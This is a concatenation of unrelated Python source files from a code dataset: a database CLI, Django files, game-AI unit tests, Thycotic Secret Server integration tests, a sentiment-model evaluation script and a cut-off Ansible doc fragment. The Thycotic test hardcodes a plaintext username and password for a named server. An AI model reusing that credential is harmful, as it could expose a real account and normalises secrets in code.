@runtime_on_any_exception
def _all(self, args):
if 'labcondition' == args[0]:
found_rows = self._db.get(
'Products',
column='price',
cond=lambda p: int(p.value) > 100
)
print('Rows from DB.Products with price>100:')
print('\n'.join(map(str, found_rows)))
else:
for table_name in args:
table_rows = self._db.table(table_name).all_ids()
table_pretty_rows = '\n'.join(map(lambda i: 'ID {0} {1}'.format(*i), table_rows))
print('DB.{0}:\n{1}'.format(table_name, table_pretty_rows))
@runtime_on_any_exception
def _insert(self, args):
table_name, cnt = args
table_to_insert = self._db.table(table_name)
for cur_cnt in range(int(cnt)):
print('Please, enter values for DB.{0} row:'.format(table_name))
row_to_insert = {}
for column_name, column_type in table_to_insert.columns.items():
if column_type == 'fk':
print('Enter Table for FK: fktable=', end='')
fktable = input()
print('Enter Id for FK: fkid=', end='')
fkid = input()
row_to_insert[column_name] = (
{'table': fktable, 'fkid': fkid},
column_type
)
else:
print('Enter {0}, type={1}: {0}='.format(column_name, column_type), end='')
column_value = input()
row_to_insert[column_name] = (column_value, column_type)
table_to_insert.insert(row_to_insert)
@runtime_on_any_exception
def _get(self, args):
table_name, row_idx = args
print('DB.{0} id={1}:'.format(*args))
print(self._db.get(table_name, doc_id=int(row_idx)) or 'Not Found DB.{0}.{1}'.format(*args))
@runtime_on_any_exception
def _update(self, args):
table_name, row_idx = args
table_to_update = self._db.table(table_name)
row_to_update = table_to_update.get(row_id=int(row_idx))
colval_to_update = {}
print('Updating DB.{0}.{1}: {2}'.format(table_name, row_idx, row_to_update))
for column_name, column_type in table_to_update.columns.items():
if column_type == 'fk':
current_fktable = row_to_update[column_name].table
print('Change FKTable from <{0}> to value='.format(current_fktable), end='')
after_fktable = input()
current_fkid = row_to_update[column_name].fk_id
print('Change FKId from <{0}> to value='.format(current_fkid), end='')
after_fkid = input()
colval_to_update[column_name] = {
'table': after_fktable,
'fkid': after_fkid
}
else:
print('Enter value for column {0}, type={1}: {0}='.format(column_name, column_type), end='')
column_value = input()
colval_to_update[column_name] = column_value
table_to_update.update(colval_to_update, [int(row_idx)])
@runtime_on_any_exception
def _delete(self, args):
table_name, row_id = args
print('Deleted item DB.{0}.{1}'.format(*args))
print(self._db.delete(table_name, row_ids=[int(row_id)]) or 'Not Found DB.{0}.{1}'.format(*args))
def _open(self):
"""Create DB instance and preload default models."""
self._db = DB(self._path)
products = self._db.table(
'Products',
columns={'name': 'str', 'price': 'int'}
)
orders = self._db.table(
'Orders',
columns={'product': 'fk', 'client': 'str', 'destination': 'addr'}
)
try:
products.insert_multiple([
{"name": ("product1", "str"), "price": ("50", "int")},
{"name": ("product2", "str"), "price": ("100", "int")},
{"name": ("product3", "str"), "price": ("200", "int")},
])
except:
pass
try:
orders.insert_multiple([
{
"product": ({'table': 'Products', 'fkid': '1'}, 'fk'),
"client": ("honchar", "str"), "destination": ("Kyiv", "addr")
},
{
"product": ({'table': 'Products', 'fkid': '2'}, 'fk'),
"client": ("honchar2", "str"), "destination": ("Kyiv2", "addr")
},
{
"product": ({'table': 'Products', 'fkid': '3'}, 'fk'),
"client": ("honchar3", "str"), "destination": ("Kyiv3", "addr")
},
])
except:
pass
self.run('help', *())
def _close(self, _):
"""Close DB instance routine."""
self._db.close()
def __enter__(self):
self._open()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self._close(None)
| 37.049261 | 108 | 0.505252 |
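A usage sketch for the CLI above: the context manager opens the storage, preloads the demo tables, and closes the DB on exit:

with CLIUtils() as cli:
    cli.run('tables')          # list tables -> Products, Orders
    cli.run('all Products')    # dump all product rows
    cli.run('get Products 1')  # fetch a single row by id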
46950a30a497c84732798b48f44483d04a01233a
| 217 |
py
|
Python
|
top/clearlight/reptile/bilibili/bj_tech_mooc/example_04_360.py
|
ClearlightY/Python_learn
|
93b9b7efae5a1cf05faf8ee7c5e36dcc99c7a232
|
[
"Apache-2.0"
] | 1 |
2020-01-16T09:23:43.000Z
|
2020-01-16T09:23:43.000Z
|
top/clearlight/reptile/bilibili/bj_tech_mooc/example_04_360.py
|
ClearlightY/Python_learn
|
93b9b7efae5a1cf05faf8ee7c5e36dcc99c7a232
|
[
"Apache-2.0"
] | null | null | null |
top/clearlight/reptile/bilibili/bj_tech_mooc/example_04_360.py
|
ClearlightY/Python_learn
|
93b9b7efae5a1cf05faf8ee7c5e36dcc99c7a232
|
[
"Apache-2.0"
] | null | null | null |
import requests
keyword = "python"
try:
    kv = {'q': keyword}
    r = requests.get('http://www.so.com/s', params=kv)
    print(r.request.url)
    r.raise_for_status()
    print(len(r.text))
except Exception:
    print('Crawl failed')  # translated from the original Chinese '爬取失败'
| 19.727273 | 54 | 0.617512 |
3172a2c22ec1638c70e59d5c5b2388f4aa10d1ba
| 788 |
py
|
Python
|
backend/songwriter/migrations/0006_auto_20170902_0723.py
|
giliam/turbo-songwriter
|
3d100b08dc19c60d7a1324120e06bd9f971eea5a
|
[
"MIT"
] | null | null | null |
backend/songwriter/migrations/0006_auto_20170902_0723.py
|
giliam/turbo-songwriter
|
3d100b08dc19c60d7a1324120e06bd9f971eea5a
|
[
"MIT"
] | 12 |
2017-09-25T20:13:29.000Z
|
2020-02-12T00:12:41.000Z
|
backend/songwriter/migrations/0006_auto_20170902_0723.py
|
giliam/turbo-songwriter
|
3d100b08dc19c60d7a1324120e06bd9f971eea5a
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-09-02 05:23
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('songwriter', '0005_auto_20170824_1726'),
]
operations = [
migrations.AlterModelOptions(
name='author',
options={'ordering': ['lastname', 'firstname']},
),
migrations.AlterModelOptions(
name='chord',
options={'ordering': ['note']},
),
migrations.AlterModelOptions(
name='editor',
options={'ordering': ['name']},
),
migrations.AlterModelOptions(
name='theme',
options={'ordering': ['name']},
),
]
| 24.625 | 60 | 0.548223 |
73425bf1b2ce90f77e267345bd3b090b0208b790
| 16,334 |
py
|
Python
|
tests/service/ai/test_not_killing_itself_ai.py
|
jonashellmann/informaticup21-team-chillow
|
f2e519af0a5d9a9368d62556703cfb1066ebb58f
|
[
"MIT"
] | 3 |
2021-01-17T23:32:07.000Z
|
2022-01-30T14:49:16.000Z
|
tests/service/ai/test_not_killing_itself_ai.py
|
jonashellmann/informaticup21-team-chillow
|
f2e519af0a5d9a9368d62556703cfb1066ebb58f
|
[
"MIT"
] | 2 |
2021-01-17T13:37:56.000Z
|
2021-04-14T12:28:49.000Z
|
tests/service/ai/test_not_killing_itself_ai.py
|
jonashellmann/informaticup21-team-chillow
|
f2e519af0a5d9a9368d62556703cfb1066ebb58f
|
[
"MIT"
] | 2 |
2021-04-02T14:53:38.000Z
|
2021-04-20T11:10:17.000Z
|
import unittest
from datetime import datetime, timezone
from typing import List
from chillow.service.ai.not_killing_itself_ai import NotKillingItselfAI
from chillow.model.action import Action
from chillow.model.cell import Cell
from chillow.model.direction import Direction
from chillow.model.game import Game
from chillow.model.player import Player
from chillow.service.game_service import GameService
class NotKillingItselfAITest(unittest.TestCase):
def test_ai_should_choose_the_own_non_killing_itself_action(self):
player1 = Player(1, 0, 0, Direction.up, 1, True, "")
player2 = Player(2, 4, 4, Direction.down, 3, True, "")
players = [player1, player2]
cells = [[Cell([player1]), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell([player2])]]
time = datetime(2020, 10, 1, 12, 5, 13, 0, timezone.utc)
game = Game(5, 5, cells, players, 2, True, time)
game_service = GameService(game)
sut = NotKillingItselfAI(player1, [], 3, 0, 3)
actions: List[Action] = sut.find_surviving_actions(game_service, 3)
self.assertTrue(Action.turn_right in actions)
self.assertTrue(len(actions) == 1)
def test_ai_should_choose_the_correct_list_of_actions_non_killing_itself(self):
player1 = Player(1, 0, 1, Direction.up, 1, True, "")
player2 = Player(2, 4, 4, Direction.down, 3, True, "")
players = [player1, player2]
cells = [[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell([player1]), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell([player2])]]
time = datetime(2020, 10, 1, 12, 5, 13, 0, timezone.utc)
game = Game(5, 5, cells, players, 2, True, time)
game_service = GameService(game)
sut = NotKillingItselfAI(player1, [], 3, 0, 3)
actions: List[Action] = sut.find_surviving_actions(game_service, 3)
self.assertTrue(Action.change_nothing in actions)
self.assertTrue(Action.turn_right in actions)
self.assertTrue(len(actions) == 2)
def test_ai_should_choose_the_correct_list_of_actions_non_killing_itself2(self):
player1 = Player(1, 1, 2, Direction.up, 1, True, "")
player2 = Player(2, 1, 1, Direction.down, 3, True, "")
players = [player1, player2]
cells = [[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell([player2]), Cell(), Cell(), Cell()],
[Cell(), Cell([player1]), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()]]
time = datetime(2020, 10, 1, 12, 5, 13, 0, timezone.utc)
game = Game(5, 5, cells, players, 2, True, time)
game_service = GameService(game)
sut = NotKillingItselfAI(player1, [], 3, 0, 3)
actions: List[Action] = sut.find_surviving_actions(game_service, 3)
self.assertTrue(Action.turn_left in actions)
self.assertTrue(Action.turn_right in actions)
self.assertTrue(len(actions) == 2)
def test_ai_should_choose_the_correct_list_of_actions_non_killing_itself_in_turn_6(self):
player1 = Player(1, 0, 4, Direction.up, 3, True, "")
player2 = Player(2, 0, 1, Direction.down, 3, True, "")
players = [player1, player2]
cells = [[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell([player2]), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell([player1]), Cell(), Cell(), Cell(), Cell()]]
time = datetime(2020, 10, 1, 12, 5, 13, 0, timezone.utc)
game = Game(5, 5, cells, players, 2, True, time)
game_service = GameService(game)
game_service.turn.turn_ctr = 6
sut = NotKillingItselfAI(player1, [], 4, 0, 3)
actions: List[Action] = sut.find_surviving_actions(game_service, 1)
self.assertTrue(Action.slow_down in actions)
self.assertTrue(Action.turn_right in actions)
self.assertTrue(Action.speed_up in actions)
self.assertTrue(len(actions) == 3)
def test_ai_should_not_choose_speed_up_if_max_speed_is_allready_reached(self):
MAX_SPEED = 3
player1 = Player(1, 0, 4, Direction.up, MAX_SPEED, True, "")
player2 = Player(2, 0, 1, Direction.down, 3, True, "")
players = [player1, player2]
cells = [[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell([player2]), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell([player1]), Cell(), Cell(), Cell(), Cell()]]
time = datetime(2020, 10, 1, 12, 5, 13, 0, timezone.utc)
game = Game(5, 5, cells, players, 2, True, time)
game_service = GameService(game)
sut = NotKillingItselfAI(player1, [], MAX_SPEED, 0, 3)
actions: List[Action] = sut.find_surviving_actions(game_service, 1)
self.assertTrue(Action.slow_down in actions)
self.assertTrue(Action.turn_right in actions)
self.assertTrue(len(actions) == 2)
def test_ai_should_calc_action_with_max_distance(self):
player1 = Player(1, 0, 4, Direction.up, 1, True, "")
player2 = Player(2, 0, 1, Direction.down, 3, True, "")
players = [player1, player2]
cells = [[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell([player2]), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell([player1]), Cell(), Cell(), Cell(), Cell()]]
time = datetime(2020, 10, 1, 12, 5, 13, 0, timezone.utc)
game = Game(5, 5, cells, players, 2, True, time)
game_service = GameService(game)
sut = NotKillingItselfAI(player1, [], 3, 0, 3)
actions: List[Action] = sut.calc_action_with_max_distance_to_visited_cells(game_service, [Action.speed_up,
Action.change_nothing,
Action.turn_right])
self.assertTrue(Action.turn_right in actions)
self.assertTrue(len(actions) == 1)
def test_ai_should_calc_all_action_with_max_distance_with_max_worse_distance(self):
MAX_WORSE_DISTANCE = 1
player1 = Player(1, 0, 4, Direction.up, 1, True, "")
player2 = Player(2, 4, 4, Direction.down, 3, True, "")
players = [player1, player2]
cells = [[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell([player1]), Cell(), Cell(), Cell(), Cell([player2])]]
time = datetime(2020, 10, 1, 12, 5, 13, 0, timezone.utc)
game = Game(5, 5, cells, players, 2, True, time)
game_service = GameService(game)
sut = NotKillingItselfAI(player1, [], 3, MAX_WORSE_DISTANCE, 3)
actions: List[Action] = sut.calc_action_with_max_distance_to_visited_cells(game_service, [Action.speed_up,
Action.change_nothing,
Action.turn_right])
self.assertTrue(Action.speed_up in actions)
self.assertTrue(Action.change_nothing in actions)
self.assertTrue(Action.turn_right in actions)
self.assertTrue(len(actions) == 3)
def test_get_information(self):
player = Player(1, 0, 4, Direction.up, 1, True, "")
sut = NotKillingItselfAI(player, [], 3, 1, 3)
expected = "max_speed=3, max_worse_distance=1, depth=3"
result = sut.get_information()
self.assertEqual(expected, result)
def test_ai_should_choose_the_correct_list_of_actions_non_killing_itself_with_depth_greater_than_one(self):
player1 = Player(1, 1, 2, Direction.up, 1, True, "")
player2 = Player(2, 1, 1, Direction.down, 3, True, "")
players = [player1, player2]
cells = [[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell([player2]), Cell([player2]), Cell(), Cell(), Cell()],
[Cell(), Cell([player1]), Cell(), Cell(), Cell()],
[Cell([player2]), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()]]
time = datetime(2020, 10, 1, 12, 5, 13, 0, timezone.utc)
game = Game(5, 5, cells, players, 2, True, time)
game_service = GameService(game)
sut = NotKillingItselfAI(player1, [], 3, 0, 2)
actions: List[Action] = sut.find_surviving_actions(game_service, 2)
self.assertTrue(Action.turn_right in actions)
self.assertTrue(len(actions) == 1)
def test_ai_should_choose_empty_list_with_depth_greater_than_one_and_no_surviving_action(self):
player1 = Player(1, 1, 2, Direction.up, 1, True, "")
player2 = Player(2, 1, 1, Direction.down, 3, True, "")
players = [player1, player2]
cells = [[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell([player2]), Cell([player2]), Cell([player2]), Cell(), Cell()],
[Cell(), Cell([player1]), Cell(), Cell([player2]), Cell()],
[Cell([player2]), Cell(), Cell([player2]), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()]]
time = datetime(2020, 10, 1, 12, 5, 13, 0, timezone.utc)
game = Game(5, 5, cells, players, 2, True, time)
game_service = GameService(game)
sut = NotKillingItselfAI(player1, [], 3, 0, 2)
actions: List[Action] = sut.find_surviving_actions(game_service, 2)
self.assertTrue(len(actions) == 0)
def test_ai_should_choose_correct_list_with_depth_three_and_surviving_action(self):
player1 = Player(1, 1, 2, Direction.up, 1, True, "")
player2 = Player(2, 1, 1, Direction.down, 3, True, "")
players = [player1, player2]
cells = [[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell([player2]), Cell([player2]), Cell([player2]), Cell(), Cell()],
[Cell(), Cell([player1]), Cell(), Cell([player2]), Cell()],
[Cell([player2]), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()]]
time = datetime(2020, 10, 1, 12, 5, 13, 0, timezone.utc)
game = Game(5, 5, cells, players, 2, True, time)
game_service = GameService(game)
sut = NotKillingItselfAI(player1, [], 3, 0, 3)
actions: List[Action] = sut.find_surviving_actions(game_service, 3)
self.assertTrue(Action.turn_right in actions)
self.assertTrue(len(actions) == 1)
def test_ai_should_choose_empty_list_with_depth_three_and_no_surviving_action(self):
player1 = Player(1, 1, 2, Direction.up, 1, True, "")
player2 = Player(2, 1, 1, Direction.down, 3, True, "")
players = [player1, player2]
cells = [[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell([player2]), Cell([player2]), Cell([player2]), Cell(), Cell()],
[Cell(), Cell([player1]), Cell(), Cell([player2]), Cell()],
[Cell([player2]), Cell([player2]), Cell(), Cell([player2]), Cell()],
[Cell(), Cell(), Cell([player2]), Cell(), Cell()]]
time = datetime(2020, 10, 1, 12, 5, 13, 0, timezone.utc)
game = Game(5, 5, cells, players, 2, True, time)
game_service = GameService(game)
sut = NotKillingItselfAI(player1, [], 3, 0, 3)
actions: List[Action] = sut.find_surviving_actions(game_service, 3)
self.assertTrue(len(actions) == 0)
def test_ai_should_choose_best_list_of_actions_by_depth_from_lower_depth(self):
player1 = Player(1, 1, 2, Direction.up, 1, True, "")
player2 = Player(2, 1, 1, Direction.down, 3, True, "")
players = [player1, player2]
cells = [[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell([player2]), Cell([player2]), Cell([player2]), Cell(), Cell()],
[Cell(), Cell([player1]), Cell(), Cell([player2]), Cell()],
[Cell([player2]), Cell([player2]), Cell(), Cell([player2]), Cell()],
[Cell(), Cell(), Cell([player2]), Cell(), Cell()]]
time = datetime(2020, 10, 1, 12, 5, 13, 0, timezone.utc)
game = Game(5, 5, cells, players, 2, True, time)
game_service = GameService(game)
sut = NotKillingItselfAI(player1, [], 3, 0, 5)
actions: List[Action] = sut.find_surviving_actions_with_best_depth(game_service)
self.assertTrue(Action.turn_right in actions)
self.assertTrue(len(actions) == 1)
def test_ai_should_choose_best_list_of_actions_by_depth(self):
player1 = Player(1, 1, 2, Direction.up, 1, True, "")
player2 = Player(2, 1, 1, Direction.down, 3, True, "")
players = [player1, player2]
cells = [[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell([player2]), Cell([player2]), Cell([player2]), Cell(), Cell()],
[Cell(), Cell([player1]), Cell(), Cell([player2]), Cell()],
[Cell([player2]), Cell(), Cell(), Cell([player2]), Cell()],
[Cell(), Cell(), Cell([player2]), Cell(), Cell()]]
time = datetime(2020, 10, 1, 12, 5, 13, 0, timezone.utc)
game = Game(5, 5, cells, players, 2, True, time)
game_service = GameService(game)
sut = NotKillingItselfAI(player1, [], 3, 0, 5)
actions: List[Action] = sut.find_surviving_actions_with_best_depth(game_service)
self.assertTrue(Action.turn_right in actions)
self.assertTrue(len(actions) == 1)
def test_ai_should_choose_best_list_of_actions_in_lowest_possible_depth(self):
player1 = Player(1, 1, 2, Direction.up, 1, True, "")
player2 = Player(2, 1, 1, Direction.down, 3, True, "")
players = [player1, player2]
cells = [[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell([player2]), Cell([player2]), Cell([player2]), Cell(), Cell()],
[Cell(), Cell([player1]), Cell(), Cell([player2]), Cell()],
[Cell([player2]), Cell(), Cell([player2]), Cell([player2]), Cell()],
[Cell(), Cell(), Cell([player2]), Cell(), Cell()]]
time = datetime(2020, 10, 1, 12, 5, 13, 0, timezone.utc)
game = Game(5, 5, cells, players, 2, True, time)
game_service = GameService(game)
sut = NotKillingItselfAI(player1, [], 3, 0, 5)
actions: List[Action] = sut.find_surviving_actions_with_best_depth(game_service)
self.assertTrue(Action.turn_left in actions)
self.assertTrue(Action.turn_right in actions)
self.assertTrue(len(actions) == 2)
| 52.185304 | 120 | 0.53355 |
c3027f734157db362e121ea8ce2b5d36ad4e6075
| 604 |
py
|
Python
|
gemtown/users/urls.py
|
doramong0926/gemtown
|
2c39284e3c68f0cc11994bed0ee2abaad0ea06b6
|
[
"MIT"
] | null | null | null |
gemtown/users/urls.py
|
doramong0926/gemtown
|
2c39284e3c68f0cc11994bed0ee2abaad0ea06b6
|
[
"MIT"
] | 5 |
2020-09-04T20:13:39.000Z
|
2022-02-17T22:03:33.000Z
|
gemtown/users/urls.py
|
doramong0926/gemtown
|
2c39284e3c68f0cc11994bed0ee2abaad0ea06b6
|
[
"MIT"
] | null | null | null |
from django.urls import path
from . import views
app_name = "users"
urlpatterns = [
path("all/", view=views.UserList.as_view(), name="all_user"),
path("<int:user_id>/password/", view=views.ChangePassword.as_view(), name="change password"),
path("<int:user_id>/follow/", view=views.FollowUser.as_view(), name="follow user"),
path("<int:user_id>/unfollow/", view=views.UnfollowUser.as_view(), name="unfollow user"),
path("<int:user_id>/", view=views.UserFeed.as_view(), name="user_detail_infomation"),
path("login/facebook/", view=views.FacebookLogin.as_view(), name="fb_login"),
]
| 50.333333 | 97 | 0.701987 |
c302fe24cced11c5bc506098882205738bad2b79
| 3,132 |
py
|
Python
|
Packs/Thycotic/Integrations/Thycotic/Thycotic_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/Thycotic/Integrations/Thycotic/Thycotic_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/Thycotic/Integrations/Thycotic/Thycotic_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import pytest
from Thycotic import Client, \
secret_password_get_command, secret_username_get_command, \
secret_get_command, secret_password_update_command, secret_checkout_command, secret_checkin_command, \
secret_delete_command, folder_create_command, folder_delete_command, folder_update_command
from test_data.context import GET_PASSWORD_BY_ID_CONTEXT, GET_USERNAME_BY_ID_CONTENT, \
SECRET_GET_CONTENT, SECRET_PASSWORD_UPDATE_CONTEXT, SECRET_CHECKOUT_CONTEXT, SECRET_CHECKIN_CONTEXT, \
SECRET_DELETE_CONTEXT, FOLDER_CREATE_CONTEXT, FOLDER_DELETE_CONTEXT, FOLDER_UPDATE_CONTEXT
from test_data.http_responses import GET_PASSWORD_BY_ID_RAW_RESPONSE, GET_USERNAME_BY_ID_RAW_RESPONSE, \
SECRET_GET_RAW_RESPONSE, SECRET_PASSWORD_UPDATE_RAW_RESPONSE, SECRET_CHECKOUT_RAW_RESPONSE, \
SECRET_CHECKIN_RAW_RESPONSE, SECRET_DELETE_RAW_RESPONSE, FOLDER_CREATE_RAW_RESPONSE, FOLDER_DELETE_RAW_RESPONSE, \
FOLDER_UPDATE_RAW_RESPONSE
GET_PASSWORD_BY_ID_ARGS = {"secret_id": "4"}
GET_USERNAME_BY_ID_ARGS = {"secret_id": "4"}
SECRET_GET_ARGS = {"secret_id": "4"}
SECRET_PASSWORD_UPDATE_ARGS = {"secret_id": "4", "newpassword": "NEWPASSWORD1"}
SECRET_CHECKOUT_ARGS = {"secret_id": "4"}
SECRET_CHECKIN_ARGS = {"secret_id": "4"}
SECRET_DELETE_ARGS = {"id": "9"}
FOLDER_CREATE_ARGS = {"folderName": "xsoarFolderTest3", "folderTypeId": "1", "parentFolderId": "3"}
FOLDER_DELETE_ARGS = {"folder_id": "9"}
FOLDER_UPDATE_ARGS = {"id": "12", "folderName": "xsoarTF3New"}
@pytest.mark.parametrize('command, args, http_response, context', [
(secret_password_get_command, GET_PASSWORD_BY_ID_ARGS, GET_PASSWORD_BY_ID_RAW_RESPONSE, GET_PASSWORD_BY_ID_CONTEXT),
(secret_username_get_command, GET_USERNAME_BY_ID_ARGS, GET_USERNAME_BY_ID_RAW_RESPONSE, GET_USERNAME_BY_ID_CONTENT),
(secret_get_command, SECRET_GET_ARGS, SECRET_GET_RAW_RESPONSE, SECRET_GET_CONTENT),
(secret_password_update_command, SECRET_PASSWORD_UPDATE_ARGS, SECRET_PASSWORD_UPDATE_RAW_RESPONSE,
SECRET_PASSWORD_UPDATE_CONTEXT),
(secret_checkout_command, SECRET_CHECKOUT_ARGS, SECRET_CHECKOUT_RAW_RESPONSE, SECRET_CHECKOUT_CONTEXT),
(secret_checkin_command, SECRET_CHECKIN_ARGS, SECRET_CHECKIN_RAW_RESPONSE, SECRET_CHECKIN_CONTEXT),
(secret_delete_command, SECRET_DELETE_ARGS, SECRET_DELETE_RAW_RESPONSE, SECRET_DELETE_CONTEXT),
(folder_create_command, FOLDER_CREATE_ARGS, FOLDER_CREATE_RAW_RESPONSE, FOLDER_CREATE_CONTEXT),
(folder_delete_command, FOLDER_DELETE_ARGS, FOLDER_DELETE_RAW_RESPONSE, FOLDER_DELETE_CONTEXT),
(folder_update_command, FOLDER_UPDATE_ARGS, FOLDER_UPDATE_RAW_RESPONSE, FOLDER_UPDATE_CONTEXT)
])
def test_thycotic_commands(command, args, http_response, context, mocker):
mocker.patch.object(Client, '_generate_token')
client = Client(server_url="https://thss.softwarium.net/SecretServer", username="xsoar1", password="HfpuhXjv123",
proxy=False, verify=False)
mocker.patch.object(Client, '_http_request', return_value=http_response)
outputs = command(client, **args)
results = outputs.to_context()
assert results.get("EntryContext") == context
| 60.230769 | 120 | 0.814815 |
6f319a2e3b23a21c6ff1ef69178d3b4bc2931b78
| 3,322 |
py
|
Python
|
src/check_results.py
|
jagwar/Sentiment-Analysis
|
312186c066c360ed4b3ebc9e999dba419f10e93c
|
[
"MIT"
] | null | null | null |
src/check_results.py
|
jagwar/Sentiment-Analysis
|
312186c066c360ed4b3ebc9e999dba419f10e93c
|
[
"MIT"
] | null | null | null |
src/check_results.py
|
jagwar/Sentiment-Analysis
|
312186c066c360ed4b3ebc9e999dba419f10e93c
|
[
"MIT"
] | null | null | null |
import os
import json
import numpy as np
import torch
from torch.utils.data import DataLoader, RandomSampler, TensorDataset, SequentialSampler
from transformers import CamembertTokenizer, CamembertForSequenceClassification
import pandas as pd
from tqdm import tqdm, trange
# tokenizer = CamembertTokenizer.from_pretrained('/home/crannou/workspace/sentiment-eai/data/36e8f471-821d-4270-be56-febb1be36c26')
# model = CamembertForSequenceClassification.from_pretrained('/home/crannou/workspace/sentiment-eai/data/36e8f471-821d-4270-be56-febb1be36c26')
# tokenizer = CamembertTokenizer.from_pretrained('/home/crannou/workspace/sentiment-eai/7a37b1e5-8e7b-45d1-9e87-7314e8e66c0c/')
# model = CamembertForSequenceClassification.from_pretrained('/home/crannou/workspace/sentiment-eai/7a37b1e5-8e7b-45d1-9e87-7314e8e66c0c/')
tokenizer = CamembertTokenizer.from_pretrained('/home/crannou/workspace/serving-preset-images/sentiment-analysis-fr/app/model_sources')
model = CamembertForSequenceClassification.from_pretrained('/home/crannou/workspace/serving-preset-images/sentiment-analysis-fr/app/model_sources')
def eval_model():
df = pd.read_csv('/home/crannou/notebooks/review_polarity_bin.csv', sep=';')
preds = []
all_input_ids = []
all_attention_masks = []
df = df.sample(frac=0.1, random_state=42)
all_labels = df['polarity'].values
for sentence in df['review_content']:
input_ids, attention_mask = get_features(sentence)
all_input_ids.append(input_ids)
all_attention_masks.append(attention_mask)
t_inputs_ids = torch.tensor(all_input_ids, dtype=torch.long)
t_attention_mask = torch.tensor(all_attention_masks, dtype=torch.long)
t_labels = torch.tensor(all_labels, dtype=torch.long)
dataset = TensorDataset(t_inputs_ids, t_attention_mask, t_labels)
eval_sampler = SequentialSampler(dataset)
eval_dataloader = DataLoader(
dataset, sampler=eval_sampler, batch_size=32
)
model.eval()
preds = None
out_label_ids = None
with torch.no_grad():
for batch in tqdm(eval_dataloader, desc="Evaluating"):
batch = tuple(t.to("cpu") for t in batch)
inputs = {
"input_ids": batch[0], "attention_mask": batch[1], "labels": batch[2]}
outputs = model(**inputs)
_, logits = outputs[:2]
if preds is None:
preds = logits.detach().cpu().numpy()
out_label_ids = inputs["labels"].detach().cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
out_label_ids = np.append(
out_label_ids, inputs["labels"].detach().cpu().numpy(), axis=0)
preds = np.argmax(preds, axis=1)
result = {"acc": (preds == out_label_ids).mean()}
print(result)
def get_features(sentence):
max_length=min(128, tokenizer.max_len)
input_ids = tokenizer.encode(
sentence, add_special_tokens=True, max_length=min(128, tokenizer.max_len),
)
padding_length = max_length - len(input_ids)
attention_mask = [1] * len(input_ids)
input_ids = input_ids + ([0] * padding_length)
attention_mask = attention_mask + ([0] * padding_length)
return input_ids, attention_mask
if __name__ == '__main__':
eval_model()
| 40.024096 | 147 | 0.705298 |
d2c4507ff5f2b0e60108a433da49147fd8f6e6c4
| 3,008 |
py
|
Python
|
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/doc_fragments/nios.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | 17 |
2017-06-07T23:15:01.000Z
|
2021-08-30T14:32:36.000Z
|
ansible/ansible/plugins/doc_fragments/nios.py
|
SergeyCherepanov/ansible
|
875711cd2fd6b783c812241c2ed7a954bf6f670f
|
[
"MIT"
] | 9 |
2017-06-25T03:31:52.000Z
|
2021-05-17T23:43:12.000Z
|
ansible/ansible/plugins/doc_fragments/nios.py
|
SergeyCherepanov/ansible
|
875711cd2fd6b783c812241c2ed7a954bf6f670f
|
[
"MIT"
] | 3 |
2018-05-26T21:31:22.000Z
|
2019-09-28T17:00:45.000Z
|
# -*- coding: utf-8 -*-
# Copyright: (c) 2015, Peter Sprygada <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
class ModuleDocFragment(object):
# Standard files documentation fragment
DOCUMENTATION = r'''
options:
provider:
description:
- A dict object containing connection details.
type: dict
